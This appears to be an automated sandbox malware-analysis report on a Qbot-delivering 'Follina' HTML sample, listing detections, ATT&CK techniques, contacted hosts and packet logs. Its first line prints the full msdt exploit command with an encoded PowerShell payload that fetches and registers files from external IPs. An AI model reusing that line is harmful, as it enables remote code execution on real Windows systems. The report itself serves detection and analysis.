Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Command and Scripting Interpreter	Path Interception	1 Process Injection	3 Masquerading	OS Credential Dumping	1 System Information Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Qbotfollina.html	44%	Virustotal		Browse
Qbotfollina.html	32%	ReversingLabs	Document-HTML.Trojan.Woreflint

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://dns.google	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
accounts.google.com	172.217.168.45	true	false	high
clients.l.google.com	142.250.203.110	true	false	high
clients2.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1	false		high
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dns.google	48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, 3fe43805-7be2-44a9-8b75-0ea976c2d5c7.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr, b69ee39c-f2d4-4669-8779-99c284e2e4a3.tmp.1.dr	false	URL Reputation: safe	unknown
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p	craw_window.js.0.dr, craw_background.js.0.dr	false		high
https://www.google.com/intl/en-US/chrome/blank.html	craw_background.js.0.dr	false		high
https://ogs.google.com	48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	false		high
https://www.google.com/images/cleardot.gif	craw_window.js.0.dr	false		high
https://play.google.com	48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	false		high
https://payments.google.com/payments/v4/js/integrator.js	craw_window.js.0.dr, manifest.json0.0.dr	false		high
https://chromium.googlesource.com/a/native_client/pnacl-llvm.git	pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr	false		high
https://easylist.to/)	LICENSE.txt.0.dr	false		high
https://sandbox.google.com/payments/v4/js/integrator.js	craw_window.js.0.dr, manifest.json0.0.dr	false		high
https://www.google.com/images/x2.gif	craw_window.js.0.dr	false		high
https://accounts.google.com/MergeSession	craw_window.js.0.dr	false		high
http://llvm.org/):	pnacl_public_x86_64_pnacl_sz_nexe.0.dr, pnacl_public_x86_64_pnacl_llc_nexe.0.dr	false		high
https://creativecommons.org/compatiblelicenses	LICENSE.txt.0.dr	false		high
https://www.google.com	48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	false		high
https://www.google.com/images/dot2.gif	craw_window.js.0.dr	false		high
https://github.com/easylist)	LICENSE.txt.0.dr	false		high
https://creativecommons.org/.	LICENSE.txt.0.dr	false		high
https://code.google.com/p/nativeclient/issues/entry%s:	pnacl_public_x86_64_ld_nexe.0.dr	false		high
https://code.google.com/p/nativeclient/issues/entry	pnacl_public_x86_64_ld_nexe.0.dr	false		high
https://accounts.google.com	48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	false		high
https://clients2.googleusercontent.com	48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	false		high
https://apis.google.com	48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	false		high
https://www.google.com/accounts/OAuthLogin?issueuberauth=1	craw_window.js.0.dr	false		high
https://www.google.com/	manifest.json0.0.dr	false		high
https://www-googleapis-staging.sandbox.google.com	craw_window.js.0.dr, craw_background.js.0.dr	false		high
https://chromium.googlesource.com/a/native_client/pnacl-clang.git	pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr	false		high
https://clients2.google.com	48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	false		high
https://clients2.google.com/service/update2/crx	manifest.json1.0.dr, manifest.json0.0.dr, manifest.json3.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.168.45	accounts.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.203.110	clients.l.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.1
192.168.2.3
127.0.0.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	641285
Start date and time: 08/06/202209:52:40	2022-06-08 09:52:40 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 57s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Qbotfollina.html
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.expl.winHTML@33/138@2/6
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
TCP Packets have been reduced to 100
Created / dropped Files have been reduced to 100
Excluded IPs from analysis (whitelisted): 172.217.168.14, 74.125.108.201, 34.104.35.123, 172.217.168.67, 142.250.203.99
Excluded domains from analysis (whitelisted): www.bing.com, r4---sn-1gi7znek.gvt1.com, fs.microsoft.com, clientservices.googleapis.com, arc.msn.com, ris.api.iris.microsoft.com, redirector.gvt1.com, edgedl.me.gvt1.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.gstatic.com, r4.sn-1gi7znek.gvt1.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	451603
Entropy (8bit):	5.009711072558331
Encrypted:	false
SSDEEP:	12288:ZHfRTyGZ6lup8Cfrvq4JBPKh+FBlESBw4p6:NfOCzvRKhGvwJ
MD5:	A78AD14E77147E7DE3647E61964C0335
SHA1:	CECC3DD41F4CEA0192B24300C71E1911BD4FCE45
SHA-256:	0D6803758FF8F87081FAFD62E90F0950DFB2DD7991E9607FE76A8F92D0E893FA
SHA-512:	DDE24D5AD50D68FC91E9E325D31E66EF8F624B6BB3A07D14FFED1104D3AB5F4EF1D7969A5CDE0DFBB19CB31C506F7DE97AF67C2F244F7E7E8E10648EA8321101
Malicious:	false
Reputation:	high, very likely benign file
Preview:	BDic.... ....6...."..Z..4g....6.2...{/...3...5....AF 1363.AF nm.AF pt.AF n1.AF p.AF tc.AF SM.AF M.AF S.AF MS.AF MNR.AF GDS.AF MNT.AF MH.AF MR.AF SZMR.AF MJ.AF MT.AF MY.AF MRZ.AF MN.AF MG.AF RM.AF N.AF MV.AF XM.AF DSM.AF SD.AF G.AF R.AF MNX.AF MRS.AF MD.AF MNRB.AF B.AF ZSMR.AF PM.AF SMNGJ.AF SMN.AF ZMR.AF SMGB.AF MZR.AF GM.AF SMR.AF SMDG.AF RMZ.AF ZM.AF MDG.AF MDT.AF SMNXT.AF SDY.AF LSDG.AF LGDS.AF GLDS.AF UY.AF U.AF DSGNX.AF GNDSX.AF DSG.AF Y.AF GS.AF IEMS.AF YP.AF ZGDRS.AF XGNVDS.AF UT.AF GNDS.AF GVDS.AF MYPS.AF XGNDS.AF TPRY.AF MDSG.AF ZGSDR.AF DYSG.AF PMYTNS.AF AGDS.AF DRZGS.AF PY.AF GSPMDY.AF EGVDS.AF SL.AF GNXDS.AF DSBG.AF IM.AF I.AF MDGS.AF SMY.AF DSGN.AF DSLG.AF GMDS.AF MDSBG.AF SGD.AF IY.AF P.AF DSMG.AF BLZGDRS.AF TR.AF AGSD.AF ZGBDRSL.AF PTRY.AF ASDGV.AF ASM.AF ICANGSD.AF ICAM.AF IKY.AF AMS.AF PMYTRS.AF BZGVDRS.AF SDRBZG.AF GVMDS.AF PSM.AF DGLS.AF GNVXDS.AF AGDSL.AF DGS.AF XDSGNV.AF BZGDRS.AF AM.AF AS.AF A.AF LDSG.AF AGVDS.AF SDG.AF LDSMG.AF EDSMG.AF EY.AF DRSMZG.AF PRYT.AF LZ

Source: Qbotfollina.html	Virustotal: Detection: 43%			Perma Link
Source: Qbotfollina.html	ReversingLabs: Detection: 31%

Source: Joe Sandbox View	JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View	JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.82.209.183
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115

Source: Ruleset Data.0.dr	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr, Ruleset Data.0.dr	String found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr	String found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)

Source: pnacl_public_x86_64_pnacl_sz_nexe.0.dr, pnacl_public_x86_64_pnacl_llc_nexe.0.dr	String found in binary or memory: http://llvm.org/):
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr	String found in binary or memory: https://accounts.google.com/MergeSession
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	String found in binary or memory: https://apis.google.com
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr	String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr	String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json1.0.dr, manifest.json0.0.dr, manifest.json3.0.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: pnacl_public_x86_64_ld_nexe.0.dr	String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
Source: pnacl_public_x86_64_ld_nexe.0.dr	String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
Source: LICENSE.txt.0.dr	String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.0.dr	String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, 3fe43805-7be2-44a9-8b75-0ea976c2d5c7.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr, b69ee39c-f2d4-4669-8779-99c284e2e4a3.tmp.1.dr	String found in binary or memory: https://dns.google
Source: LICENSE.txt.0.dr	String found in binary or memory: https://easylist.to/)
Source: d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	String found in binary or memory: https://fonts.googleapis.com
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com
Source: LICENSE.txt.0.dr	String found in binary or memory: https://github.com/easylist)
Source: craw_window.js.0.dr, craw_background.js.0.dr	String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	String found in binary or memory: https://ogs.google.com
Source: craw_window.js.0.dr, manifest.json0.0.dr	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	String found in binary or memory: https://play.google.com
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr	String found in binary or memory: https://r4---sn-1gi7znek.gvt1.com
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr	String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.0.dr, manifest.json0.0.dr	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr	String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	String found in binary or memory: https://www.google.com
Source: manifest.json0.0.dr	String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr	String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, craw_window.js.0.dr, craw_background.js.0.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	String found in binary or memory: https://www.googleapis.com
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 48c73de8-0090-4d04-9af6-227975bb8e5b.tmp.1.dr, d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp.1.dr	String found in binary or memory: https://www.gstatic.com

File type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	4.836014560592255
TrID:	HyperText Markup Language (12001/1) 51.06% HyperText Markup Language (11501/1) 48.94%
File name:	Qbotfollina.html
File size:	6241
MD5:	a32050027aea96b3b70e1056490a98c9
SHA1:	ef28c67583c8c8048c0baaead036680a60441213
SHA256:	e3ba1c45f9dd1f432138654b5f19cf89c55e07219b88aa7628334d38bb036433
SHA512:	1c2a1605b67feb57f99dc4c7daffb16d1f3cc48d12cfc338c6d4fd84348dd6a872f6a0daeda70e96f49ad05b0f9690211f67346e3e4660ca2e79ed6f038a6c0c
SSDEEP:	192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
TLSH:	8FD1B7716E2A17104BE113B99396CCEEE358E41037D3AB58ECF64A2EB459A0CC713294
File Content Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 8, 2022 09:53:49.185261011 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.185291052 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.185394049 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.185516119 CEST	49705	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.185533047 CEST	443	49705	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.185602903 CEST	49705	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.188307047 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.188328981 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.188357115 CEST	49705	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.188370943 CEST	443	49705	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.342768908 CEST	443	49705	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.342863083 CEST	49705	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.344583035 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.344883919 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.360430956 CEST	49696	443	192.168.2.3	40.126.31.143
Jun 8, 2022 09:53:49.366539955 CEST	49705	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.366564989 CEST	443	49705	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.366925955 CEST	443	49705	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.367024899 CEST	49705	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.368241072 CEST	49705	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.368638992 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.368665934 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.368797064 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.368808031 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.368949890 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.369016886 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.408497095 CEST	443	49705	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.504848957 CEST	443	49705	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.504941940 CEST	443	49705	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.505017996 CEST	49705	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.506172895 CEST	49705	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.506206036 CEST	49705	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.506236076 CEST	443	49705	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.546287060 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.546324968 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.546348095 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.546524048 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.546551943 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.546570063 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.546698093 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.588310957 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.588388920 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.588495970 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.588521004 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.588543892 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.588565111 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.588614941 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.588675022 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.629951000 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.630081892 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.630136013 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.630184889 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.633716106 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:49.633742094 CEST	443	49704	20.82.209.183	192.168.2.3
Jun 8, 2022 09:53:49.633750916 CEST	49704	443	192.168.2.3	20.82.209.183
